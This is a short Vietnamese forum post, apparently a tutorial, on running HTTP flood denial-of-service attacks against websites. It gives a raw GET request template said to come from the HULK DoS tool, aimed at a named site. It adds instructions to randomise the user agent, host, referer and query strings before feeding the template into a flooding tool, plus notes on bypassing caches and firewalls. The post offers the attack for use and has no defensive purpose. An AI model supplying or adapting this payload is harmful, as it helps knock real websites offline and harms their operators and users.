Skip to main content

[TUT] HTTP Flood site HTML và 1 số site không cho connection = keep-alive

Cách dùng > thay user agent , thay host name thay Referer, thay random char > ném vào webhunter.

1.Thực tế nó là request của HULK dos tool @@ tut by hisoka @@ lech ghi với nhé

Trích:
GET /?ASH=REHRKP HTTP/1.1
Accept-Encoding: identity
Host: huydiet.vn
Keep-Alive: 110
User-Agent: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.google.com/?q=VUCWJE
Cache-Control: no-cache
> random char
>>Keep-Alive: 110 nên set thấp xuống tùy server conf
>>acces từ công cụ tìm kiếm.1 cách qua FW hiệu quả
>> Connection: close > close còn lâu mới nói
>>bypass cache

Share